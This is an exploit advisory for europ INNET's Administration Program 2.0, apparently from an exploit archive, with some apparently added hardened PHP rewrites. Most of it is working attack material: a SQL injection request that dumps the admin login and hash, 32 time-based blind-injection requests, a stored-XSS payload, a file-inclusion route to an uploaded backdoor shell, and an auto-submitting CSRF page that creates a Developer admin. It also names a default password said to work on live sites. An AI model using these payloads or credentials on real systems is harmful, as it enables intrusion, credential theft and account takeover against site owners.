europ INNET Web Studio Administration Program version 2.0 suffers from cross site request forgery, cross site scripting, local file inclusion, path disclosure, and remote SQL injection vulnerabilities.
8b945b66041046c68f9608814b1da5af72c0a32cca28ec9997b10974d6f42623
======================================================
Vulnerable software: Administration Programm v 2.0
Vendor: europ INNET Web Studio, www.europ-innet.com
======================================================
************************ Vulnerabilities: *************************************
//insert_guest_book.php
==============VULNERABLE CODE SECTION=================
<?php
session_start();
ob_start();
if (!isset($_POST['guest_submit']))
    exit();
include('admin/connect.php');
include('admin/api.php');
$name = $_POST['g_name'];
$message = $_POST['g_message'];
if (trim($_POST['g_message']) == '')
{
    header('location:view-page-33-gm-2.html'); exit();
}
if ($_SESSION['image_random_value'] != md5($_POST['e_code']))
{
    header('location:view-page-33-gm-3.html'); exit();
}
// Raw POST values are concatenated straight into the SQL text: a single quote in
// g_name or g_message closes the string literal and the rest of the input is
// executed as SQL. This is the injection point used by the payload below.
$query = "INSERT INTO `guest_book` SET `name`='".$_POST['g_name']."', `Enable`='0', `message`='".$_POST['g_message']."';";
mysql_query($query,$conn);
header('location:view-page-33-gm-1.html');
?>
============== END OF VULNERABLE CODE SECTION =======================
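As an added example (not the vendor's code), here is a hardened rewrite of insert_guest_book.php. It keeps the original flow and redirect targets; it assumes admin/connect.php provides $conn as a mysqli object (the original relies on the removed mysql_* extension), and uses the table and column names from the query above. The input values are bound as parameters instead of being spliced into the SQL text, which also closes the stored-XSS-through-SQLi variant described next, provided the page that lists entries encodes them on output as render_guest_entry() does. The same parameterisation applies to includes/news_subscription.php further down.

```php
<?php
// Hardened version of insert_guest_book.php (added example, not vendor code).
// Assumption: admin/connect.php defines $conn as a mysqli connection.

/**
 * Output encoding for the page that later displays the entries. Whatever is in
 * the row, including a <script> element that got in through the injection, is
 * rendered as text rather than markup.
 */
function render_guest_entry(string $name, string $message): string
{
    $n = htmlspecialchars($name, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    $m = htmlspecialchars($message, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<div class="entry"><b>' . $n . '</b><p>' . nl2br($m) . '</p></div>';
}

session_start();
ob_start();

if (!isset($_POST['guest_submit'])) {
    exit();
}
include 'admin/connect.php';
include 'admin/api.php';

$name    = isset($_POST['g_name'])    ? trim((string) $_POST['g_name'])    : '';
$message = isset($_POST['g_message']) ? trim((string) $_POST['g_message']) : '';
$code    = isset($_POST['e_code'])    ? (string) $_POST['e_code']          : '';

if ($message === '') {
    header('Location: view-page-33-gm-2.html');
    exit();
}

// CAPTCHA check: constant-time comparison instead of the loose != of the
// original, and the challenge is consumed so it cannot be replayed.
if (!isset($_SESSION['image_random_value'])
    || !hash_equals((string) $_SESSION['image_random_value'], md5($code))) {
    header('Location: view-page-33-gm-3.html');
    exit();
}
unset($_SESSION['image_random_value']);

// The SQLi fix: user input never becomes part of the SQL text. The quote, the
// comment marker and the subselect in the payload above are stored as ordinary
// characters in the row.
$stmt = $conn->prepare(
    'INSERT INTO `guest_book` (`name`, `Enable`, `message`) VALUES (?, 0, ?)'
);
if ($stmt === false) {
    error_log('guest_book prepare failed: ' . $conn->error);
    header('Location: view-page-33-gm-2.html');
    exit();
}
$stmt->bind_param('ss', $name, $message);
if (!$stmt->execute()) {
    error_log('guest_book insert failed: ' . $stmt->error);
}
$stmt->close();

header('Location: view-page-33-gm-1.html');
exit();
```

Note that `Enable` is written as the literal 0 in the statement text, so only the two user-controlled values are bound; the database driver sends them separately from the query, and no amount of quoting inside them changes the statement's structure.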
Exploitation:
Payload: ' or message=(select concat(login,0x7c,password) from us_config limit 1),message=(select concat(login,0x7c,password) from us_config limit 1),enable=1-- AND 0='0
URL: http://192.168.0.15/learn/7878/view-page-33-gm-1.html
REQUEST METHOD: POST
HTTP HEADERS:
Host: 192.168.0.15
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: keep-alive
Cookie: ASPX=urjgh0qn8jldqigu6hrsqhc5cr4lf80f
Content-Type: application/x-www-form-urlencoded
Content-Length: 449
POST BODY:
g_name=%27+or+message%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cmessage%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cenable%3D1--+AND+0%3D%270&g_message=%27+or+message%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cmessage%3D%28select+concat%28login%2C0x7c%2Cpassword%29+from+us_config+limit+1%29%2Cenable%3D1--+AND+0%3D%270&e_code=15984&guest_submit=Send
RESULT: You will see credentials like: developer|0cc175b9c0f1b6a831c399e269772661
It is also possible to create a stored XSS through the SQLi
Payload:
' or message=(select 0x3C7363726970743E616C6572742827596F752068617665204265656E2050774E654420427920417A65726261696A616E20426C61636B204861745A27293B3C2F7363726970743E),message=(select 0x3C7363726970743E616C6572742827596F752068617665204265656E2050774E654420427920417A65726261696A616E20426C61636B204861745A27293B3C2F7363726970743E),enable=1-- AND 0='0
Print Screen: http://s59.radikal.ru/i165/1207/a7/2bd24a646ee3.png
========================================================================
Second: Blind SQL Injection
We used the time-based method to obtain credentials (I spent 6 hours of my life extracting the complete tables + columns + credentials for the password: a)
=========================================================================
//includes/news_subscription.php
<?php
session_start();
ob_start();
if (!isset($_POST['email_submit']))
    exit();
$p_email_2 = $_POST['p_email_2'];
// The e-mail address is concatenated into the SQL string without validation or
// escaping; this is the injection point used by the time-based requests below.
$query = "INSERT INTO `users_email_list` SET `users_email`='".$_POST['p_email_2']."';";
mysql_query($query,$conn);
?>
======================END OF VULNERABLE CODE SECTION==================================
Here is the *final* stage of obtaining the admin credentials:
The 1st character of the password of the user named developer:
=================================================================
1st character: 0
//TRUE
email_submit=&p_email_2=' or (select if(substr(`password`,1,1)='0',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
2nd character: c
email_submit=&p_email_2=' or (select if(substr(`password`,2,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
3rd character: c (check later)
email_submit=&p_email_2=' or (select if(substr(`password`,3,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
4th character: 1
email_submit=&p_email_2=' or (select if(substr(`password`,4,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
5th character: 7
email_submit=&p_email_2=' or (select if(substr(`password`,5,1)='7',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
6th character: 5
email_submit=&p_email_2=' or (select if(substr(`password`,6,1)='5',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
7th character: b (check later)
email_submit=&p_email_2=' or (select if(substr(`password`,7,1)='b',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
8th character: 9 (check later)
email_submit=&p_email_2=' or (select if(substr(`password`,8,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
9th character: c
email_submit=&p_email_2=' or (select if(substr(`password`,9,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
10th character: 0 (check later)
email_submit=&p_email_2=' or (select if(substr(`password`,10,1)='0',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
11th character: f
email_submit=&p_email_2=' or (select if(substr(`password`,11,1)='f',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
12th character: 1 (check later; the server is lagging, so the result may be wrong)
email_submit=&p_email_2=' or (select if(substr(`password`,12,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
13th character: b
email_submit=&p_email_2=' or (select if(substr(`password`,13,1)='b',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
14th character: 6
email_submit=&p_email_2=' or (select if(substr(`password`,14,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
15th character: a
email_submit=&p_email_2=' or (select if(substr(`password`,15,1)='a',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
16th character: 8
email_submit=&p_email_2=' or (select if(substr(`password`,16,1)='8',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
17th character: 3
email_submit=&p_email_2=' or (select if(substr(`password`,17,1)='3',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
18th character: 1
email_submit=&p_email_2=' or (select if(substr(`password`,18,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
19th character: c
email_submit=&p_email_2=' or (select if(substr(`password`,19,1)='c',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
20th character: 3
email_submit=&p_email_2=' or (select if(substr(`password`,20,1)='3',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
21st character: 9
email_submit=&p_email_2=' or (select if(substr(`password`,21,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
22nd character: 9
email_submit=&p_email_2=' or (select if(substr(`password`,22,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
23rd character: e
email_submit=&p_email_2=' or (select if(substr(`password`,23,1)='e',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
24th character: 2
email_submit=&p_email_2=' or (select if(substr(`password`,24,1)='2',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
25th character: 6
email_submit=&p_email_2=' or (select if(substr(`password`,25,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
26th character: 9
email_submit=&p_email_2=' or (select if(substr(`password`,26,1)='9',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
27th character: 7
email_submit=&p_email_2=' or (select if(substr(`password`,27,1)='7',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
28th character: 7
email_submit=&p_email_2=' or (select if(substr(`password`,28,1)='7',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
29th character: 2
email_submit=&p_email_2=' or (select if(substr(`password`,29,1)='2',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
30th character: 6
email_submit=&p_email_2=' or (select if(substr(`password`,30,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
31st character: 6
email_submit=&p_email_2=' or (select if(substr(`password`,31,1)='6',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
32nd character: 1
email_submit=&p_email_2=' or (select if(substr(`password`,32,1)='1',sleep(50),0) from us_config limit 1)-- AND 5='5
=================================================================
Login: developer
MD5 HASH: 0cc175b9c0f1b6a831c399e269772661
Pass: a
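The character-by-character extraction above works because each probe can hold a PHP worker for the full sleep(50) and nothing records that it happened. As an added example (not the vendor's code), two defence-in-depth measures that bound and expose this channel; they complement, and do not replace, parameterised queries. The host, credentials and timeout values are placeholders, and the server-side cap assumes MySQL 5.7.8 or later (MariaDB uses max_statement_time in seconds instead).

```php
<?php
// Added example (not vendor code): timeouts plus slow-request logging for the
// time-based blind injection shown above.

// 1. Bound how long a request may wait on MySQL. The client read timeout makes
//    PHP give up on a query that sleeps; the server-side cap (MySQL 5.7.8+,
//    milliseconds) aborts long SELECTs such as the lookup in admin/editor.php,
//    but does not apply to INSERT statements like the one in
//    news_subscription.php, hence the client-side timeout as well.
function connect_with_timeouts(string $host, string $user, string $pass, string $db,
                               int $readTimeoutSeconds = 5, int $selectCapMs = 5000): mysqli
{
    $conn = mysqli_init();
    $conn->options(MYSQLI_OPT_CONNECT_TIMEOUT, 3);
    $conn->options(MYSQLI_OPT_READ_TIMEOUT, $readTimeoutSeconds); // mysqlnd, PHP 7.2+
    if (!$conn->real_connect($host, $user, $pass, $db)) {
        throw new RuntimeException('db connect failed: ' . mysqli_connect_error());
    }
    if ($conn->query('SET SESSION max_execution_time = ' . $selectCapMs) === false) {
        error_log('max_execution_time not supported by this server: ' . $conn->error);
    }
    return $conn;
}

// 2. Log every request that ran longer than a threshold. A run of requests to
//    one endpoint, from one client, that all take about sleep() seconds is the
//    signature of the extraction above and is easy to alert on.
function install_slow_request_logger(float $thresholdSeconds = 3.0): void
{
    $start = microtime(true);
    register_shutdown_function(static function () use ($start, $thresholdSeconds): void {
        $elapsed = microtime(true) - $start;
        if ($elapsed < $thresholdSeconds) {
            return;
        }
        // Metadata only: the POST body may contain credentials and is not logged.
        error_log(sprintf('slow-request %.2fs %s %s from %s',
            $elapsed,
            $_SERVER['REQUEST_METHOD'] ?? '-',
            $_SERVER['SCRIPT_NAME'] ?? '-',
            $_SERVER['REMOTE_ADDR'] ?? '-'));
    });
}

// Usage at the top of each entry script, e.g. includes/news_subscription.php
// (placeholder credentials):
install_slow_request_logger();
$conn = connect_with_timeouts('localhost', 'dbuser', 'dbpass', 'cms');
```

With the read timeout at 5 s and the logger threshold at 3 s, a probe that triggers sleep(50) fails after 5 s instead of 50, and the request still appears in the error log as a slow-request line, so the probing is both throttled and visible.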
==================================================================
Local File Inclusion+Exploitation:
//admin/editor.php
===================== BEGIN VULNERABLE CODE SECTION======================
$page=$_GET["page"];
// CALCULATE ACCESS LEVEL
// $page (and $section) go into the query unescaped: SQL injection.
$res=mysql_query("SELECT * FROM `navigation_menu` where Section='".$section."' and Page='".$page."'",$conn);
$arr2=mysql_fetch_array($res);
if($arr2['access_level__Name__Access_Level']!=''){
    $_SESSION['s_admin_access_level']=$arr2['access_level__Name__Access_Level'];
}
/////////////////////////// FIX PAGE
// $page is later used as an include path. The is_file() check only requires that
// some file exists, so a traversal path or a %00-terminated name still passes.
if($page==""){$page="main";}
if(is_file("includes/".$page.".php")==false){$page="main";}
By the way, the same code snippet is also vulnerable to SQL injection, but it is a bit harder to exploit because you will get a permission error.
You can use this approach to obtain other users' passwords:
http://192.168.0.15/learn/7878/admin/editor.php?page=help%27%20or%20%28select%20if%28substr%28login,1,1%29=%27d%27,sleep%2830%29,0%29%20from%20us_config%20limit%201%29--%20ANd%20999=%27999
====================END OF VULNERABLE CODE SECTION ======================
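As an added example (not the vendor's code), a hardened page selection for admin/editor.php that addresses both defects in the snippet above: the page name is restricted to an allowlisted character set and confirmed with realpath() to resolve inside includes/, and the access-level lookup binds its parameters. It assumes $conn is a mysqli connection and that $section has already been validated elsewhere; the table and column names are those from the original query. It is stricter than the original in one respect: subdirectory pages (such as the images/images case mentioned below) are no longer includable, which is a deliberate design choice.

```php
<?php
// Added example (not vendor code): safe ?page= handling for admin/editor.php.
// Assumes $conn (mysqli) and a validated $section are already defined.

const INCLUDES_DIR = __DIR__ . '/includes';

/**
 * Resolve ?page= to a file under includes/. Rejects traversal ("../..//"),
 * null bytes ("%00") and anything that is not exactly includes/<name>.php,
 * falling back to "main" like the original code.
 */
function resolve_page(?string $requested): string
{
    $page = (string) $requested;
    if ($page === '' || !preg_match('/\A[a-z0-9_-]{1,64}\z/i', $page)) {
        return 'main';
    }
    // Belt and braces: even with the character allowlist, confirm the resolved
    // file lives inside the includes directory.
    $real = realpath(INCLUDES_DIR . '/' . $page . '.php');
    $base = realpath(INCLUDES_DIR);
    if ($real === false || $base === false
        || strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return 'main';
    }
    return $page;
}

/**
 * The access-level lookup with bound parameters instead of string
 * concatenation. Returns the stored level, or null when there is no row.
 */
function lookup_access_level(mysqli $conn, string $section, string $page): ?string
{
    $stmt = $conn->prepare(
        'SELECT `access_level__Name__Access_Level` FROM `navigation_menu`'
        . ' WHERE `Section` = ? AND `Page` = ? LIMIT 1'
    );
    if ($stmt === false) {
        error_log('navigation_menu prepare failed: ' . $conn->error);
        return null;
    }
    $stmt->bind_param('ss', $section, $page);
    $stmt->execute();
    $stmt->bind_result($level);
    $found = $stmt->fetch();
    $stmt->close();
    return ($found && $level !== null && $level !== '') ? (string) $level : null;
}

$page  = resolve_page($_GET['page'] ?? null);
$level = lookup_access_level($conn, $section, $page);
if ($level !== null) {
    $_SESSION['s_admin_access_level'] = $level;
}
include INCLUDES_DIR . '/' . $page . '.php';
```

A request such as page=../..///db/mea.gif%00 fails the regular expression before any filesystem call is made, and the injected SQL in the page=help' ... request above is bound as a literal string, so the lookup simply finds no matching row.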
Go to:
http://site.tld/admin/editor.php?page=images/images
First, upload your backdoor as a *.gif file:
Then try to include it like this:
http://site.tld/admin/editor.php?page=../..///db/mea.gif%00
You will get a shell there ;)
==========================================================================
CSRF add admin:
Login: akastep
Password: akastep
=================BEGIN EXPLOIT============================================
<!DOCTYPE HTML>
<html>
<head>
    <title>0day For you.</title>
</head>
<body onload="javascript:document.forms[0].submit()">
<form method="post" action="http://===>CHANGE_TO_TARGET<===/admin/editor.php?page=submit&section=us_config">
    <input type="text" name="Full_Name" value="akastep" />
    <select name="access_level__Name__Access_Level">
        <option value="">None</option>
        <option value="1">Content Manager</option>
        <option value="2">Advanced Manager</option>
        <option value="3">Administrator</option>
        <option value="4">System Administrator</option>
        <option value="5" selected>Developer</option>
    </select>
    <!-- Developer = High Privilege -->
    <input type="text" name="combobox_access_level__Name__Access_Level" value="1" />
    <input type="text" name="Email" value="pipi@pipi.tld" />
    <input type="text" name="Login" value="akastep" />
    <input type="text" name="Password_password_cache" value="akastep" />
    <input type="text" name="Password" value="akastep" />
    <input type="checkbox" name="Javascript_Navigation" value="1" />
    <input type="text" name="id" value="new" />
</form>
</body>
</html>
=================END OF CSRF EXPLOIT===================================
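The auto-submitting page above works because the admin handler accepts any POST that carries a valid session cookie. As an added example (not the vendor's code), synchroniser-token protection for the admin forms, plus SameSite session-cookie flags which on their own stop the browser from attaching the admin session to a cross-site form post. It assumes PHP 7.3 or later for the array form of session_set_cookie_params() and that the admin panel is served over HTTPS; the handler path named in the final comment is the one in the exploit form above.

```php
<?php
// Added example (not vendor code): CSRF protection for the admin forms.

// Session cookie flags (PHP 7.3+ array form). With SameSite=Lax the browser
// does not send the session cookie on a cross-site POST, so the submitted
// form above arrives without a session and is rejected before any token check.
session_set_cookie_params([
    'httponly' => true,
    'secure'   => true,   // assumes HTTPS
    'samesite' => 'Lax',
]);
session_start();

/** Per-session token, generated once from the CSPRNG. */
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

/** Hidden field to place inside every admin form. */
function csrf_field(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

/**
 * Validate a state-changing request: constant-time token comparison, and when
 * the browser sends an Origin header it must name this host. A forged page on
 * another origin cannot read the token, so it cannot supply a matching value.
 */
function csrf_verify(array $post, array $server): bool
{
    $sent = $post['csrf_token'] ?? '';
    if (!is_string($sent) || empty($_SESSION['csrf_token'])
        || !hash_equals($_SESSION['csrf_token'], $sent)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN'])) {
        $originHost = parse_url($server['HTTP_ORIGIN'], PHP_URL_HOST);
        if (!is_string($originHost) || $originHost !== ($server['SERVER_NAME'] ?? null)) {
            return false;
        }
    }
    return true;
}

// At the top of the handler behind editor.php?page=submit&section=us_config,
// before any row is written:
if ($_SERVER['REQUEST_METHOD'] === 'POST' && !csrf_verify($_POST, $_SERVER)) {
    http_response_code(403);
    exit('Invalid request.');
}
// ... and echo csrf_field() inside the legitimate user-editing form.
```

The token is generated once per session and compared with hash_equals(), so timing differences cannot leak it; rotating it per form is possible but not required for this attack model.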
XSS:
http://192.168.0.15/learn/7878/admin/editor.php?section=users_email_list&show_page=18%3Cscript%3Ealert%28%22Enjoy%20With%200day%20xD%22%29;%3C/script%3E
========================================================================
Default Password:
We found a few .am sites which use this CMS with the following credentials:
Login: developer
Password: a
========================================================================
Path Disclosure:
http://192.168.0.15/learn/7878/admin/includes/auth.php
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 14
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 15
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 39
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 46
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in C:\Program Files\Apache Software Foundation\Apache2.2\htdocs\learn\7878\admin\includes\auth.php on line 49
http://www.europ-innet.com/menu.php
Warning: mysql_query(): supplied argument is not a valid MySQL-Link resource in /home/content/e/u/r/europinnet1112/html/menu.php on line 6
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/content/e/u/r/europinnet1112/html/menu.php on line 8
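The warnings above leak the installation path because PHP is configured to print errors to the visitor and the code carries on after a failed database connection. As an added example (not the vendor's code), the production-side settings and a fail-closed connection: errors go to a log file outside the web root and the visitor sees a generic message. The log path and the connection variables are placeholders.

```php
<?php
// Added example (not vendor code): stop path disclosure through PHP warnings.

// Weak (development) settings that produce the output shown above:
//   display_errors = On
//   log_errors     = Off
// Corrected settings for a deployed site. These can equally go in php.ini or a
// .user.ini; setting them here makes the intent visible in the application.
ini_set('display_errors', '0');
ini_set('display_startup_errors', '0');
ini_set('log_errors', '1');
ini_set('error_log', __DIR__ . '/../logs/php-error.log'); // placeholder: must be outside htdocs and writable
error_reporting(E_ALL);

// Fail closed instead of continuing with an invalid link (the cause of the
// "not a valid MySQL-Link resource" warnings in auth.php). mysqli throws
// exceptions in this mode, so a failed connection cannot be silently ignored.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
try {
    $conn = new mysqli($dbHost, $dbUser, $dbPass, $dbName); // placeholders from the site config
} catch (mysqli_sql_exception $e) {
    error_log('db connect failed: ' . $e->getMessage()); // detail stays server-side
    http_response_code(503);
    exit('Service temporarily unavailable.');
}
```

With display_errors off the response to /admin/includes/auth.php is an empty or generic page instead of a list of absolute paths, and the failure is still recorded where operators can see it.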
=========================================================================
==========================================================================
Demo: dsif-am.org
Want more demos?
http://www.europ-innet.com/view-page-8.html
Enjoy)
********************* AZERBAIJAN BLACK HATZ***********************************
Of course we never forget our friends, so BIG RESPECT + THANKS TO ALL:
===========================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securityvulns.com
securitylab.ru
1337day.com
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
to all AA Team + to all Azerbaijan Black HatZ +
*Especially to my bro CAMOUFL4G3.*
===========================================================
Thanks + Respect to all friends!
/AkaStep & BOT_25